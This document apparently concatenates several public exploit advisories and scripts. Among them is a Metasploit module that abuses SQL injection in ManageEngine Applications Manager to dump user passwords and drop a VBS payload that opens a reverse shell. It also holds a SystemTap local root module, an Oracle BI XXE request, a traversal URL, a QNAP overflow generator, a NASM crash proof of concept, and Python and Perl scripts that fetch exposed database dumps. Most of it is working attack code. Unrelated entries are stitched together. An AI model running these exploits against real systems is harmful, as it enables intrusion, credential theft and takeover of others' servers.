##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
'Name'           => "ManageEngine Applications Manager 11.0 < 14.0 SQL Injection / Remote Code Execution",
'Description'    => %q(
        This module exploits sql and command injection vulnerability in the ManageEngine AM 14 and prior versions.
        An unauthenticated user can gain the authority of "system" on the server due to SQL injection vulnerability.
        Exploit allows the writing of the desired file to the system using the postgesql structure.
        Module is written over the payload by selecting a file with the extension ".vbs" that is used for monitoring 
        by the ManageEngine which working with "system" authority.

        In addition, it dumps the users and passwords from the database for us.
        Keep in mind! After the harmful ".vbs" file is written, the shell session may be a bit late.
        Because the ManageEngine application should run this file itself.
      ),
'License'        => MSF_LICENSE,
'Author'         =>
        [
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
        ],
'References'     =>
        [
          ['URL', 'https://pentest.com.tr/exploits/ManageEngine-App-Manager-14-SQLi-Remote-Code-Execution.html']
        ],
'DefaultOptions' =>
        {
'WfsDelay' => 500,
'PAYLOAD' => 'windows/shell_reverse_tcp',
'RPORT' => 8443,
'SSL' => true
        },
'Payload' =>
        {
'Encoder' => 'x86/shikata_ga_nai'
        },
'Platform'       => ['win'],
'Arch'           => [ARCH_X86, ARCH_X64],
'Targets'        =>
        [
           ['AppManager 14', {}],
           ['AppManager 13', {}],
           ['AppManager 12', {}],
           ['AppManager 11', {}]
        ],
'Privileged'     => true,
'DisclosureDate' => 'Apr 17 2019',
'DefaultTarget'  => 1))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
      ]
    )
  end
##
# Check exploit vulnerability basically // 'Appears' more convenient
##
  def check
    res = inject(Rex::Text.rand_text_alpha(1))

    if res.code = "200"&& res.headers['set-cookie'] =~ /JSESSIONID/
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end
##
# VBS payload and Post Data preparation
##
  def get_payload

    handler
    payload = generate_payload_exe
    @vbs_content = Msf::Util::EXE.to_exe_vbs(payload)
    ## determining the target directory
    if target.name == 'AppManager 14'
      tfile = "AppManager14"
    elsif target.name == 'AppManager 13'
      tfile = "AppManager13"
    elsif target.name == 'AppManager 12'
      tfile = "AppManager12"
    elsif target.name == 'AppManager 11'
      tfile = "AppManager11"
    end

    fhashes = Rex::Text.rand_text_alpha_lower(8) + ".txt"
    ## parameters required to read the user table
    hashes = "sid=1;copy+(select+username,password+from+AM_UserPasswordTable)+to+$$"
    hashes << "c:\\Program+Files+(x86)\\ManageEngine\\"
    hashes << "#{tfile}"
    hashes << "\\working\\"
    hashes << "#{fhashes}"
    hashes << "$$;--"

    res = inject("#{hashes}")

    if res.code = "200"&& res.headers['set-cookie'] =~ /JSESSIONID/
      print_good("Users in the database were taken...")
      res = send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, "#{fhashes}") # users file url
      })

      if res.code == "404"
       fail_with(Failure::Unreachable, 'The database could not be read!')
      else
       print_status("--------------------Usernames and Passwords---------------------")
       puts res.body # users table output
       print_status("----------------------------------------------------------------") 
      end 
    else
      fail_with(Failure::Unreachable, 'Connection error occurred!')
    end

    ## fetch base64 part in vbs payload
    pb64 = @vbs_content.split('"
  Dim')[0].split(' = "')[2]
    ## vbs file in one line
    vbs_file = 'On Error Resume Next:Set objWbemLocator = CreateObject("WbemScripting.SWbemLocator"):'
    vbs_file << 'if Err.Number Then:WScript.Echo vbCrLf & "Error # "& ""& Err.Description:End If:O'
    vbs_file << 'n Error GoTo 0:On Error Resume Next:Select Case WScript.Arguments.Count:Case 2:strCo'
    vbs_file << 'mputer = Wscript.Arguments(0):strQuery = Wscript.Arguments(1):Set wbemServices = obj'
    vbs_file << 'WbemLocator.ConnectServer (strComputer,"Root\\CIMV2"):Case 4:strComputer = Wscript.A'
    vbs_file << 'rguments(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):st'
    vbs_file << 'rQuery = Wscript.Arguments(3):Set wbemServices = objWbemLocator.ConnectServer (strCo'
    vbs_file << 'mputer,"Root\\CIMV2",strUsername,strPassword):case 6:strComputer = Wscript.Arguments'
    vbs_file << '(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):strQuery ='
    vbs_file << ' Wscript.Arguments(4):namespace = Wscript.Arguments(5):Set wbemServices = objWbemLoca'
    vbs_file << 'tor.ConnectServer (strComputer,namespace,strUsername,strPassword):Case Else:strMsg ='
    vbs_file << '"Error # in parameters passed":WScript.Echo strMsg:WScript.Quit(0):End Select:Set w'
    vbs_file << 'bemServices = objWbemLocator.ConnectServer (strComputer, namespace, strUsername, str'
    vbs_file << 'Password):if Err.Number Then:WScript.Echo vbCrLf & "Error # "& ""& Err.Descriptio'
    vbs_file << 'n:End If:On Error GoTo 0:On Error Resume Next:Set colItems = wbemServices.ExecQuery(s'
    vbs_file << 'trQuery):if Err.Number Then:WScript.Echo vbCrLf & "Error # "& ""& Err.Description'
    vbs_file << ':End If:On Error GoTo 0:i=0:For Each objItem in colItems:if i=0 then:header = "":For '
    vbs_file << 'Each param in objItem.Properties_:header = header & param.Name & vbTab:Next:WScript.E'
    vbs_file << 'cho header:i=1:end if:serviceData = "":For Each param in objItem.Properties_:serviceD'
    vbs_file << 'ata = serviceData & param.Value & vbTab:Next:WScript.Echo serviceData:Next:Function b'
    vbs_file << 'PBdVfYpfCEHF(hBPVZMitxq):HHgwqsqii = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-m'
    vbs_file << 'icrosoft-com:datatypes"& Chr(34) & ""& "dt:dt="& Chr(34) & "bin.base64"& Chr(34)'
    vbs_file << '& ">"& hBPVZMitxq & "</B64DECODE>":Set TInPBSeVlL = CreateObject("MSXML2.DOMDocument'
    vbs_file << '.3.0"):TInPBSeVlL.LoadXML(HHgwqsqii):bPBdVfYpfCEHF = TInPBSeVlL.selectsinglenode("B64D'
    vbs_file << 'ECODE").nodeTypedValue:set TInPBSeVlL = nothing:End Function:Function txhYXYJJl():Emkf'
    vbs_file << 'dMDdusgGha = "'
    vbs_file << "#{pb64}"
    vbs_file << '":Dim CCEUdwNSS:Set CCEUdwNSS = CreateObject("Scripting.FileSystemObject"):Dim zhgqIZn'
    vbs_file << 'K:Dim gnnTqZvAcL:Set zhgqIZnK = CCEUdwNSS.GetSpecialFolder(2):gnnTqZvAcL = zhgqIZnK & '
    vbs_file << '"\"& CCEUdwNSS.GetTempName():CCEUdwNSS.CreateFolder(gnnTqZvAcL):yZUoLXnPic = gnnTqZvAc'
    vbs_file << 'L & "\"& "SAEeVSXQVkDEIG.exe":Dim mEciydMZTsoBmAo:Set mEciydMZTsoBmAo = CreateObject("'
    vbs_file << 'Wscript.Shell"):LXbjZKnEQUfaS = bPBdVfYpfCEHF(EmkfdMDdusgGha):Set TUCiiidRgJQdxTl = Cre'
    vbs_file << 'ateObject("ADODB.Stream"):TUCiiidRgJQdxTl.Type = 1:TUCiiidRgJQdxTl.Open:TUCiiidRgJQdxT'
    vbs_file << 'l.Write LXbjZKnEQUfaS:TUCiiidRgJQdxTl.SaveToFile yZUoLXnPic, 2:mEciydMZTsoBmAo.run yZU'
    vbs_file << 'oLXnPic, 0, true:CCEUdwNSS.DeleteFile(yZUoLXnPic):CCEUdwNSS.DeleteFolder(gnnTqZvAcL):E'
    vbs_file << 'nd Function:txhYXYJJl:WScript.Quit(0)'
    ## encode the vbs file to base64 and then encode the url-hex
    encoding_vbs = Rex::Text.uri_encode(Rex::Text.encode_base64(vbs_file), 'hex-all')

    ## post preparation // creating and writing files on the server with SQLi
    vbs_payload = "sid=1;copy+(select+convert_from(decode($$#{encoding_vbs}$$,$$base64$$)"
    vbs_payload << ",$$utf-8$$))+to+$$C:\\\\Program+Files+(x86)\\\\ManageEngine\\\\"
    vbs_payload << "#{tfile}"
    vbs_payload << "\\\\working\\\\conf\\\\application\\\\scripts\\\\wmiget.vbs$$;"

    res = inject("#{vbs_payload}")

    if res.code = "200"&& res.headers['set-cookie'] =~ /JSESSIONID/
      print_good("The harmful .vbs file was successfully written to the server.")
      print_status("Keep in mind! You may have to wait between 10-300 seconds for the shell session.")
    else
      fail_with(Failure::Unreachable, 'Connection error occurred!')
    end

    return payload
  end
##
# Call functions
##
  def exploit
    unless Exploit::CheckCode::Appears == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    print_status("Payload is preparing...")
    get_payload

  end
##
# Inj payload
##
  def inject(payload)

    res = send_request_cgi(
      {
'method' => 'POST',
'ctype'  => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, '/jsp/Popup_SLA.jsp'),
'data' => payload
      }, 25)

  end
end
##
# The end of the adventure (o_O) // AkkuS
##

# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)
# Date: 2018-09-05
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: https://www.nasm.us/
# Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
# Version: 2.14rc15 and earlier
# Tested on: 2.14rc15
# CVE : CVE-2018-16517

asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file.

PoC:
1. echo "equ   push  rax"> poc
2. nasm -f elf poc

insn_is_label remains FALSE and therefore leaving result->label assigned to NULL which is then dereference in islocal().

   [...]

    if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) {    <-- not taken
        /* there's a label here */
        first = false;
        result->label = tokval.t_charptr;
        i = stdscan(NULL, &tokval);
        if (i == ':') {         /* skip over the optional colon */
            i = stdscan(NULL, &tokval);
        } else if (i == 0) {
            nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1,
"label alone on a line without a colon might be in error");
        }
        if (i != TOKEN_INSN || tokval.t_integer != I_EQU) {
            /*
             * FIXME: location.segment could be NO_SEG, in which case
             * it is possible we should be passing 'absolute.segment'. Look into this.
             * Work out whether that is *really* what we should be doing.
             * Generally fix things. I think this is right as it is, but
             * am still not certain.
             */
            define_label(result->label,
                         in_absolute ? absolute.segment : location.segment,
                         location.offset, true);
    [...]

static bool islocal(const char *l)
{
    if (tasm_compatible_mode) {
        if (l[0] == '@'&& l[1] == '@')
            return true;
    }
    return (l[0] == '.'&& l[1] != '.');  <-- boom
}

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
'Description'    => %q{
        This module attempts to gain root privileges by exploiting a
        vulnerability in the `staprun` executable included with SystemTap
        version 1.3.

        The `staprun` executable does not clear environment variables prior to
        executing `modprobe`, allowing an arbitrary configuration file to be
        specified in the `MODPROBE_OPTIONS` environment variable, resulting
        in arbitrary command execution with root privileges.

        This module has been tested successfully on:

        systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
        systemtap 1.1-3.el5 on RHEL 5.5 (x64).
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Tavis Ormandy', # Discovery and exploit
'bcoles'         # Metasploit
        ],
'DisclosureDate' => '2010-11-17',
'References'     =>
        [
          ['BID', '44914'],
          ['CVE', '2010-4170'],
          ['EDB', '15620'],
          ['URL', 'https://securitytracker.com/id?1024754'],
          ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],
          ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],
          ['URL', 'https://bugs.launchpad.net/bugs/677226'],
          ['URL', 'https://www.debian.org/security/2011/dsa-2348']
        ],
'Platform'       => ['linux'],
'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
'SessionTypes'   => ['shell', 'meterpreter'],
'Targets'        => [['Auto', {}]],
'DefaultTarget'  => 0))
    register_options [
      OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def staprun_path
    datastore['STAPRUN_PATH']
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  def check
    # On some systems, staprun execution is restricted to stapusr group:
    # ---s--x---. 1 root stapusr 178488 Mar 28  2014 /usr/bin/staprun
    unless cmd_exec("test -x '#{staprun_path}'&& echo true").include? 'true'
      vprint_error "#{staprun_path} is not executable"
      return CheckCode::Safe
    end
    vprint_good "#{staprun_path} is executable"

    unless setuid? staprun_path
      vprint_error "#{staprun_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{staprun_path} is setuid"

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    config_path = "#{base_dir}/#{payload_name}.conf"
    upload config_path, "install uprobes /bin/sh"

    print_status 'Executing payload...'
    res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}"
    vprint_line res
  end
end

#!/usr/bin/python
# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
# Date: 19/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.qnap.com
# Version: 1.3.4.0317 and below are vulnerable
# Software Link: https://www.qnap.com/en/utilities/essentials
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP/7/10 (version 1.3.3.0925)
# CVE: CVE-2019-7181
# POC
# 1.) Generate qnap.txt
# 2.) Copy the contents of qnap.txt to the clipboard
# 3.) Paste the contents in any username/password field(Add or Edit VPN)
# 4.) Click ok, program crashes.
# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.

buffer = "A" * 1000

payload = buffer
try:
    f=open("qnap.txt","w")
    print "[+] Creating %s bytes QNAP payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2616 (7.2/10)

PoC:

POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101
Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 76
Content-Type: text/xml; charset=UTF-8

<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN""http://IP/123 <http://ehost/123>
">

# Exploit Title: Directory traversal in Oracle Business Intelligence
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2588

PoC

http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini

###########################################################################

# Exploit Title : ChurchCRM Software 3.3.2 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/04/2019
# Vendor Homepage : churchcrm.io
# Software Download Link : 
github.com/ChurchCRM/CRM/releases/download/3.3.2/ChurchCRM-3.3.2.zip
# Software Information Link : churchcrm.io/features/
# Software Version : 3.3.2 and other lower versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
ChurchCRM is an OpenSource Church CRM & Management Software. 

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 

MySQL over the World Wide Web. It can be used to dump a database or a collection of 

databases for backup or transfer to another SQL server (not necessarily a MySQL server). 

The dump typically contains SQL statements to create the table, populate it, or both. 

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 

should not be found on a production system.

* It looks like this file contains a database backup/dump. 

Acunetix inferred this filename from the domain name. A database backup contains a record of the

 table structure and/or the data from a database and is usually in the form of a list of SQL statements. 

A database backup is most often used for backing up a database so that its contents can be restored 

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible 

to the web server. As a workaround, you could restrict access to this file.

###########################################################################

File :
******
/demo/ChurchCRM-Database.sql

/ChurchCRM-Database.sql

Information :
*************
-- mysqldump-php github.com/ifsnop/mysqldump-php
--
-- Host: localhost  Database: churchcrm
-- ------------------------------------------------------
-- Server version   5.7.21-0ubuntu0.16.04.1
-- Date: Mon, 09 Apr 2018 12:04:25 -0400

-- Table structure for table `config_cfg`

-- Dumping data for table `config_cfg`

-- Table structure for table `person_per`

-- Dumping data for table `person_per`

-- Table structure for table `user_usr`

-- Dumping data for table `user_usr`

-- Table structure for table `userconfig_ucfg`

-- Dumping data for table `userconfig_ucfg`

raw.githubusercontent.com/ChurchCRM/CRM/master/demo/ChurchCRM-Database.sql

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/demo/ChurchCRM-Database.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('ChurchCRM Software 3.3.2 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="demo/ChurchCRM-Database.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/demo/ChurchCRM-Database.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/demo/ChurchCRM-Database.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

###########################################################################

# Exploit Title : OpenDocMan Document Management System 1.3.5 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/04/2019
# Vendor Homepage : opendocman.com
# Software Download Link : opendocman.com/free-download/
github.com/opendocman/opendocman/archive/master.zip
sourceforge.net/projects/opendocman/files/opendocman/1.3.5/opendocman-1.3.5.zip/download
# Software Information Link : opendocman.com/features/
# Software Version : 1.3.5 and All Other Lower Versions
opendocman.com/category/changelog/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
OpenDocMan - Free PHP Document Management System DMS

OpenDocMan is a web based document management system (DMS) written in PHP designed to 

comply with ISO 17025 and OIE standard for document management. It features fine grained

control of access to files, and automated install and upgrades.

Features

* Upload files using web browser
* Control access to files based on department or individual user permissions
* Track revisions of documents
* Option to send new and updated files through review process
* Installs on most web servers with PHP
* Set up a reviewal process for all new files

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 

MySQL over the World Wide Web. It can be used to dump a database or a collection of 

databases for backup or transfer to another SQL server (not necessarily a MySQL server). 

The dump typically contains SQL statements to create the table, populate it, or both. 

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 

should not be found on a production system.

* It looks like this file contains a database backup/dump. 

Acunetix inferred this filename from the domain name. A database backup contains a record of the

 table structure and/or the data from a database and is usually in the form of a list of SQL statements. 

A database backup is most often used for backing up a database so that its contents can be restored 

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible 

to the web server. As a workaround, you could restrict access to this file.

###########################################################################

File :
******
/database.sql

Information :
*************
# MySQL dump of OpenDocMan

# Table structure for table 'odm_access_log'

# Table structure for table 'odm_admin'

# Dumping data for table 'odm_admin'

# Table structure for table 'odm_category'

# Dumping data for table 'odm_category'

# Table structure for table 'odm_data'

# Dumping data for table 'odm_data'

# Table structure for table 'odm_department'

# Dumping data for table 'odm_department'

# Table structure for table 'odm_dept_perms'

# Dumping data for table 'odm_dept_perms'

# Table structure for table 'odm_dept_reviewer'

# Dumping data for table 'odm_dept_reviewer'

# Dumping data for table 'odm_log'

# Table structure for table 'odm_rights'

# Dumping data for table 'odm_rights'

# Table structure for table 'odm_user'

raw.githubusercontent.com/opendocman/opendocman/master/database.sql

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/database.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('OpenDocMan Document Management System 1.3.5 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="database.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/database.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/database.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

###########################################################################

# Exploit Title : RingsDB Software 1.0.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/04/2019
# Vendor Homepage : ringsdb.com
# Software Download Link : github.com/Sydtrack/ringsdb/archive/1.0.0.zip
# Software Information Link : ringsdb.com/about
# Software Version : 1.0.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
Deckbuilder for The Lord of the Rings (Physical / Digital) Library System.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 

MySQL over the World Wide Web. It can be used to dump a database or a collection of 

databases for backup or transfer to another SQL server (not necessarily a MySQL server). 

The dump typically contains SQL statements to create the table, populate it, or both. 

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 

should not be found on a production system.

* It looks like this file contains a database backup/dump. 

Acunetix inferred this filename from the domain name. A database backup contains a record of the

 table structure and/or the data from a database and is usually in the form of a list of SQL statements. 

A database backup is most often used for backing up a database so that its contents can be restored 

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible 

to the web server. As a workaround, you could restrict access to this file.

Very quick guide on how to install a local copy =>
*********************************************
This guide assumes you know how to use the command-line and 
that your machine has php and mysql installed.

install composer: getcomposer.org/download/
clone the repo somewhere
cd to it
run composer install (at the end it will ask for the database configuration parameters)
run php app/console doctrine:database:create
run php app/console doctrine:schema:create
import data into mysql
run php app/console server:run

###########################################################################

File :
******
/card-data.sql

Information :
*************
-- MySQL dump 10.13  Distrib 5.6.19, for osx10.7 (i386)
--
-- Host: localhost    Database: ringsdb
-- ------------------------------------------------------
-- Server version  5.6.21

-- Dumping data for table `card`

-- Dumping routines for database 'ringsdb'

-- Dump completed.

raw.githubusercontent.com/Sydtrack/ringsdb/master/card-data.sql

File :
*****
/packs-data.sql

Information :
*************
-- MySQL dump 10.13  Distrib 5.6.19, for osx10.7 (i386)
--
-- Host: localhost    Database: ringsdb
-- ------------------------------------------------------
-- Server version  5.6.21

-- Dumping data for table `cycle`

-- Dumping data for table `pack`

-- Dumping data for table `sphere`

-- Dumping data for table `type`

-- Dumping routines for database 'ringsdb'

-- Dump completed.

raw.githubusercontent.com/Sydtrack/ringsdb/master/packs-data.sql

File :
*****
/scenario-data.sql

Information :
*************
-- MySQL dump 10.13  Distrib 5.6.19, for osx10.7 (i386)
--
-- Host: localhost    Database: ringsdb
-- ------------------------------------------------------
-- Server version  5.6.21

-- Dumping data for table `encounter`

-- Dumping data for table `scenario`

-- Dumping data for table `scenario_encounter`

-- Dumping routines for database 'ringsdb'

-- Dump completed.

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/card-data.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('RingsDB 1.0.0 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="card-data.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/card-data.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/card-data.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

